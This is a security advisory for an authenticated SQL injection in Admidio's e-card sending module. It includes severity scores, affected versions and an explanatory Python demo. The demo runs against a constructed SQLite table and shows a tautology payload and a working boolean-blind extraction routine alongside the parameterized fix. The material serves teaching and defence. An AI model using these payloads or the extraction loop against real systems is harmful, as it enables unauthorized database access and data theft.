CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
9.4%
SSVC
Exploitation
poc
Automatable
no
Technical Impact
total
Admidio is a free, open source user management system for websites of organizations and groups. In Admidio before version 4.3.9, there is an SQL injection in the /adm_program/modules/ecards/ecard_send.php source file of the Admidio application. The SQL injection results in a compromise of the application's database. The value of the ecard_recipients POST parameter is concatenated directly into the SQL query in the source code, causing the SQL injection. The SQL injection can be exploited by a member user (authenticated, low-privilege) using blind condition-based, time-based, and out-of-band interaction SQL injection payloads. This vulnerability is fixed in 4.3.9.
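The description above names the root cause (an untrusted POST value concatenated into a query) and the exploitation style (blind, condition-based). The following is an added example, not Admidio's code and not its schema: it models the pattern with a constructed in-memory SQLite table (the table `recipients`, the column `secret`, and the function names `lookup_vulnerable`, `lookup_fixed`, `blind_oracle` and `extract_secret` are all assumptions made for illustration). It shows why a concatenated integer parameter gives an attacker a true/false oracle, how that oracle leaks data one character at a time, and how type validation plus a bound parameter closes the hole.

```python
import sqlite3
import string

# Constructed sample data for the example; this is NOT Admidio's schema.
SAMPLE_ROWS = [
    (1, "alice@example.org", "alice-token"),
    (2, "bob@example.org", "bob-token"),
]


def make_db():
    """Build an in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE recipients (usr_id INTEGER PRIMARY KEY, email TEXT, secret TEXT)"
    )
    conn.executemany("INSERT INTO recipients VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, recipient):
    """Hypothetical vulnerable pattern: the request value is glued into the SQL text.

    Anything the client sends after the number becomes part of the WHERE clause.
    """
    sql = "SELECT email FROM recipients WHERE usr_id = " + recipient
    return [row[0] for row in conn.execute(sql)]


def blind_oracle(conn, condition):
    """Boolean-based blind probe against the vulnerable lookup.

    Sends "<valid id> AND (<condition>)"; the row comes back only when the
    attacker-chosen condition is true, so the response length leaks one bit.
    """
    return len(lookup_vulnerable(conn, "1 AND (" + condition + ")")) > 0


def extract_secret(conn, usr_id, max_len=32):
    """Recover another row's secret one character at a time via the oracle.

    Stops when no candidate character matches (end of string) or at max_len.
    """
    charset = string.ascii_lowercase + string.digits + "-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = (
                "(SELECT substr(secret,%d,1) FROM recipients WHERE usr_id=%d)='%s'"
                % (pos, usr_id, ch)
            )
            if blind_oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # no character matched: string ended
    return recovered


def lookup_fixed(conn, recipient):
    """Hardened form: validate the type, then bind the value as a parameter.

    The value never becomes SQL text, so '1 OR 1=1' is rejected outright and a
    string that parses as an integer is compared as an integer.
    """
    try:
        usr_id = int(recipient)
    except (TypeError, ValueError):
        raise ValueError("recipient id must be an integer")
    rows = conn.execute(
        "SELECT email FROM recipients WHERE usr_id = ?", (usr_id,)
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print("normal:", lookup_vulnerable(db, "1"))
    print("tautology:", lookup_vulnerable(db, "1 OR 1=1"))
    print("blind extraction of user 2 secret:", extract_secret(db, 2))
    try:
        lookup_fixed(db, "1 OR 1=1")
    except ValueError as exc:
        print("fixed lookup rejects payload:", exc)
```

The same boolean oracle works against MySQL or PostgreSQL (both provide `substr`), and the time-based and out-of-band variants the advisory mentions differ only in how the true/false bit is observed, not in the injection point. Parameter binding (prepared statements) is the fix; escaping or blocklisting characters is not equivalent, because a numeric context has no quotes to escape.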
[
{
"cpes": [
"cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*"
],
"vendor": "admidio",
"product": "admidio",
"versions": [
{
"status": "affected",
"version": "0",
"lessThan": "4.3.9",
"versionType": "custom"
}
],
"defaultStatus": "unknown"
}
]